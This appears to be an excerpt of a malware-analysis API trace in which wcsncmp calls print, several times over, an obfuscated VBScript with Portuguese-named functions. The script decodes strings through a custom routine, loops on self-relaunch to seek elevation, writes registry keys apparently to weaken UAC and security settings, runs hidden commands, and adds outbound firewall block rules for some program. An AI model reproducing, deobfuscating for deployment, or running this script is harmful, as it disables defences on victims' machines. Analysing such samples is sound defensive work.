CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107 [0226.292] wcsncmp (_String1=", x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0226.292] wcsncmp (_String1=" x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.292] wcsncmp (_String1="x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107 [0226.292] wcsncmp (_String1="4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", 